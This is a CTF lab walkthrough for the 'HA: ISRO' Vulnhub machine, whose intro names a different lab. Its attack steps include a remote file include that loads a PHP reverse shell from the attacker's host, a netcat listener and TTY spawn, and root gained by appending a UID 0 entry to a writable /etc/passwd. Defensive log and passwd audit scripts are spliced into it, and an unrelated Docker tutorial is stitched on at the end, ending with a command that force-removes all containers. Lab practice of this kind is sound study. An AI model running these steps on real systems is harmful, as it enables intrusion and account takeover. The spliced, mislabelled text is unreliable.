HA: ISRO Vulnhub Walkthrough


Today we are going to solve our CTF challenge called “HA: Infinity Stones”. We have developed this lab for the purpose of online penetration testing practice. Solving this lab is not that tough if you have proper basic knowledge of penetration testing. Let’s start and learn how to breach it.
Download Here
Level: Intermediate
Task: Find 4 Flags on the victim’s machine.
Penetration Methodologies
· Scanning Network
  o Netdiscover
  o Nmap
· Enumeration
  o Browsing HTTP Service
  o Performing Directory Bruteforce
· Exploitation
  o LFI
  o Create PHP reverse shell
  o Reading /etc/passwd file
  o Getting a reverse connection
  o Spawning a TTY Shell
· Privilege Escalation
  o Writable /etc/passwd File
Walkthrough
Scanning Network
First of all, we try to identify our target; for this, we use the following command:
netdiscover

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:
nmap -A 192.168.1.104

Enumeration
With the help of the nmap scan, we now know that ports 22 and 80 are open, running SSH and HTTP respectively. Since port 80 is open, we open the target IP address in our browser as shown in the following image:
http://192.168.1.104

It opened a webpage as shown in the above image. Here we found the bhaskara page, so we opened it and found an information webpage there, as shown in the image below:
http://192.168.1.104/bhaskara.html

As is convention, we enumerate the webpage by going through its source code. We see that we have the Bhaskara Launch Code. This seems to be base64-encoded text.

Now we have to decode it. To do this we use the echo command piped into base64 -d.
echo "L2JoYXNrYXJh" | base64 -d
After decoding the base64-encoded text we get "/bhaskara". This seems to be a hint that there might be a directory named bhaskara.

So, we went to our browser in order to browse the bhaskara directory. We see that a file is downloaded when we browse the URL. This is a 2MB file. After enumerating the file, we came to realise that it is a TrueCrypt container.

Now, in order to crack this file, we extract its hash using true.py. You can download true.py from this link. We ran it against the downloaded file, redirected the output to a hashes file, and ran John the Ripper against it, which gave us the password xavier.
python true.py bhaskara > hashes
john hashes
john hashes --show

Now, as we knew it was a TrueCrypt file, it might be hiding something inside it. So, we tried to open it using VeraCrypt by providing its path and selecting a volume slot, as shown in the given image.

Upon mounting the TrueCrypt file on a slot, we are asked to enter the password. We enter the password that we found earlier, i.e. ‘xavier’.

It opened up to show a text file labelled ‘flag.txt’. We opened it, and it gave us our first flag, the Bhaskara Flag.
Bhaskara Flag: {b7bb88578a70970b9be45ac8630b6f9d}

Now let's move forward with Enumeration. We also performed a directory scan with dirb, which gave us an /img directory. A second scan for the .php extension gave us a connect.php.
dirb http://192.168.1.104
dirb http://192.168.1.104 -X .php
We went into the /img directory. Here we found an image called aryabhata.jpg.

We downloaded aryabhata.jpg and opened it. Upon opening it, we found it to be a poster for the Aryabhata satellite, as shown in the image given below.

As we couldn't find anything specific in the image, we suspected that some steganography was involved. Hence, we decided to use the Steghide tool to extract anything that might be hidden in the image. We saw that there is a text file named flag.txt hidden inside it. On opening it we found the Aryabhata flag.
steghide extract -sf aryabhata.jpg
cat flag.txt
Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation
Back in the web browser: we had also found a connect.php in our dirb directory bruteforce. Opening it directly gave us nothing. Then we realised that this could be command injection. To test it, we tried opening the /etc/passwd file through it. As seen in the image given below, it is a File Inclusion vulnerability.
192.168.1.104/connect.php?file=/etc/passwd

We edited our shell.php to enter the attacker machine's IP address, then saved and closed the file. Now we need to serve this to the target machine, so we started a Python HTTP server using the one-liner shown below.
nano shell.php
python -m SimpleHTTPServer

We are going to capture a reverse connection using netcat, so we need to start a listener on the port mentioned in the shell file.
nc -lvp 1234
After starting the listener, we run the shell on the target machine using the File Inclusion vulnerability.
192.168.1.104/connect.php?file=http://192.168.1.103:8000/shell.php
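From the defender's side, the two connect.php requests above leave distinctive traces in the web server's access log. The following Python script is added here and is not part of the original walkthrough: it scans Apache-style log lines for the absolute-path, traversal and remote-URL patterns used against a file-include parameter and reports them; the log lines, pattern lists and category names are my own constructions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache-style access log lines (not from the original page),
# modelled on the two requests in the walkthrough plus two benign ones.
SAMPLE_LOG = """\
192.168.1.103 - - [10/Oct/2019:12:00:01 +0000] "GET /connect.php?file=/etc/passwd HTTP/1.1" 200 1422
192.168.1.50 - - [10/Oct/2019:12:01:00 +0000] "GET /bhaskara.html HTTP/1.1" 200 2048
192.168.1.103 - - [10/Oct/2019:12:00:05 +0000] "GET /connect.php?file=http://192.168.1.103:8000/shell.php HTTP/1.1" 200 0
192.168.1.50 - - [10/Oct/2019:12:01:10 +0000] "GET /img/aryabhata.jpg HTTP/1.1" 200 102400
"""

# Common log format: client, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths that a file-include parameter should never legitimately point at.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/proc/self/environ")
# Schemes and wrappers that indicate a remote or stream include attempt.
INCLUDE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:", "expect://")


def classify_value(value):
    """Return a reason string if a query value looks like an LFI/RFI attempt, else None."""
    v = unquote(unquote(value)).lower()  # undo double URL-encoding as well
    if v.startswith(INCLUDE_SCHEMES):
        return "remote/wrapper include (RFI)"
    if "../" in v or "..\\" in v:
        return "directory traversal"
    if any(p in v for p in SENSITIVE_PATHS):
        return "sensitive file path (LFI)"
    return None


def scan_log(lines):
    """Parse each log line and report every query parameter that classifies as suspicious."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected format
        parts = urlsplit(m.group("target"))
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            reason = classify_value(value)
            if reason:
                hits.append({"ip": m.group("ip"), "path": parts.path, "param": param,
                             "status": int(m.group("status")), "reason": reason})
    return hits
```

Run scan_log over real access-log lines to get one record per suspicious parameter; a 200 status on such a request, as in the constructed lines, is what separates a successful include from a probe that was rejected.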

Upon execution, the shell gave us a session on the target machine. As seen in the image given below, it wasn’t a proper shell, so we needed a Python one-liner to convert it into a proper TTY shell.
python3 -c 'import pty;pty.spawn("/bin/bash")'
We used the netstat command to check the IP addresses and ports the target machine is listening on, and found that a service on port 3306 is bound to localhost only. The most common service to run on port 3306 is MySQL. Let’s enumerate in that direction.
netstat -antp

We tried to log in to the MySQL database as the root user. After logging in to MySQL, we enumerated the databases. Here we found a database named ‘flag’. We looked inside the tables of the flag database and found the Mangalyaan Flag.
mysql -u root
show databases;
use flag;
show tables;
select * from flag;
Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435}

Privilege Escalation
As part of our enumeration for escalating privileges on the target machine, we check whether /etc/passwd is writable. We can see that the file is, in fact, writable. This is our way forward.
ls -la /etc/passwd

Now we are going to need a password hash for the user that we will create on the target machine by making an entry in the /etc/passwd file. We use openssl to generate a salted MD5-crypt hash (the -1 option):
openssl passwd -1 -salt user3 pass123
$1$user3$rAGRVf5p2jYTqtq0W5cPu/

Now, back to our remote shell on the target machine. Here we use the hash generated in the previous step to create a user raj with UID 0, i.e. root privileges. We used the echo command to append an entry to the /etc/passwd file, then checked the entry using the tail command. Now all we have to do is run the su command with the user name we just created and enter the password, and we have a root shell. We traversed into the root directory to find our final flag, the Chandrayaan Flag.
echo 'raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash' >>/etc/passwd
tail /etc/passwd
su raj
Password: pass123
cd /root
ls
cat final.txt 
Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2}
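The escalation above depends on a writable /etc/passwd and leaves behind a second UID 0 account whose hash sits directly in the passwd field instead of /etc/shadow. The following Python audit is added here and is not part of the original walkthrough: it flags exactly those artefacts in passwd-format text and checks a file mode for group/world write; the sample content is constructed from the entry used above, and the reason strings are my own.

```python
import os
import stat

# Constructed passwd-format sample (not from the original page): three normal
# entries plus the kind of line the walkthrough appends with echo.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash
"""

# Password-field values meaning "hash lives in /etc/shadow" or "account locked".
SHADOWED_OR_LOCKED = ("x", "*", "!", "!!", "*NP*")


def audit_passwd_text(text):
    """Return (line_number, reason) findings for the passwd-format text given."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, "malformed entry, expected 7 colon-separated fields"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append((n, f"extra UID 0 account '{name}'"))
        if pw == "":
            findings.append((n, f"empty password field for '{name}'"))
        elif pw not in SHADOWED_OR_LOCKED:
            findings.append((n, f"password hash stored directly in passwd for '{name}'"))
    return findings


def is_group_or_world_writable(mode):
    """True if an st_mode value grants write to group or others (the misconfiguration used above)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_passwd_file(path="/etc/passwd"):
    """Audit a real passwd file: permission check first, then the content checks above."""
    findings = []
    if is_group_or_world_writable(os.stat(path).st_mode):
        findings.append((0, f"{path} is writable by group or others"))
    with open(path, encoding="utf-8", errors="replace") as f:
        findings.extend(audit_passwd_text(f.read()))
    return findings
```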

Docker Installation & Configuration


Docker services are extensively used in IT operations, so it is very important that you start learning from the docker basics. In this article, we will cover the installation and setup of docker, along with its specific uses.
Table of Contents
· Introduction to docker
· Docker and its terminology
· Advantages of docker
· Installation and usage

Introduction to Docker
Docker is a third-party tool developed to create an isolated environment in which to execute any application. These applications are run using containers. Containers are unique because they bundle all the dependencies of an application into a single package and deploy it.
Now, to work with docker you will need to install the docker engine on your host. It is the foundation of the docker system, and it basically runs as a client-server application. Its daemon process is referred to as the server, the command line interface is referred to as the client, and a REST API is used as the communication link between client and server.
In Linux, the docker client interacts with the docker server through the CLI. Here, the terminal is the docker client and the docker host runs the docker daemon.



Whereas on Windows, to work with docker, we need to install the Docker Toolbox component on the docker host in order to set up the environment on your Windows or iOS machine.





Docker and its terminology
When working with docker, one should be familiar with the following terms:

· Docker Hub: a cloud-hosted repository available to everyone who uses docker. Through Docker Hub, one can create, store, test, pull and share container images.

· Docker Images: a docker image acts as a template from which containers are created. The build command is used to create docker images.

· Docker containers: a container is the isolated environment provided to a docker image and its dependencies so that it can run independently. The purpose of deploying a container is to update, repair or simply modify an application and share it. When working on an image, a container lets you create a layer for each command used, which makes it easy to modify it or to upgrade or downgrade its version.

· Docker Registry: all docker images are stored in a docker registry. Users can either have a local registry on their own system or use a public one like Docker Hub.

Advantages of docker

·         Easy to use
·         Faster scaling systems
·         Better software delivery
·         Flexibility
·         Provides isolated environment
·         Supports software defined networking
·         Rapid deployment
·         Security

Installation and usage

To install docker, simply open the Linux terminal and type the following command:

apt install docker.io


To check the version, one can use the following command:
docker --version

Further, you can run the help command in docker, as follows, to see all the options that docker puts at your service.
docker --help


Once docker is up and running, you can run or pull any image into your docker host. For instance, here we have run hello-world. When you run the following command, it first checks your local image store; if the image is not available there, it pulls it from Docker Hub.

docker run hello-world


As we explained before, the CLI works as a client, so directly from the terminal you can search for any image you like. Here we have searched for ubuntu. One thing to remember is that the image with the most stars will be the most authentic one.
docker search ubuntu

Once you find your image, you can pull it to your docker host with the following command:
docker pull ubuntu


Now, to check how many images you have in docker, simply type the following command:
docker images


To remove any image, use the following command :
docker rmi hello-world
Here, rmi refers to remove image.




Now, in the details given by the ps command, you can see that the name of the container running our ubuntu image is adoring_curie, which is a random name generated by docker for every container. To give the container a name of our choosing instead, we can use the following command:

docker run -it -d --name "ignite" ubuntu

And you can confirm with the ps command again that the name has been changed as shown in the image below :


The docker attach command lets you attach to a running container using its container ID or name; through attach you only get the container's single existing shell instance. If you want to open a new terminal with a new instance of the container's shell, use docker exec instead.
docker attach ignite
docker exec -it ignite /bin/bash


Using the ps command we can see all the containers (processes) that are running in docker. For this, type:
docker ps
docker ps -a


To stop the running container, you can use the stop command as shown in the image below. We have stopped the container and its process, which can be confirmed with the help of the ps command; as a result there should be no running process for ignite.
docker stop ignite


If you want to export the docker container's filesystem as a tar archive, use the export command and compress its output with gzip. The export command fetches the whole container, like a snapshot of a regular VM.
docker export ignite | gzip > {path for tar}/filename.tar.gz

It will give you a flat archive containing the filesystem of your container.


Once you have exported a container as a tar file, you can import it back as a new image; docker import prints the hash (image ID) of the image it creates:
cat {path of exported tar file} | docker import - newignitelab


To save an image so that you can load it on another docker host, use the save command. It packs the layers and metadata of the whole chain required to build the image. You can subsequently load this saved image into a new docker instance and create containers from it.
docker save {image name} | gzip > {path for tar}/filename.tar.gz
docker load -i /home/raj/docker/igniteimage.tar


To remove all containers at once, force-stopping any that are still running, use:
docker rm -f $(docker ps -aq)


To learn how to set up a vulnerable web application using docker, see here.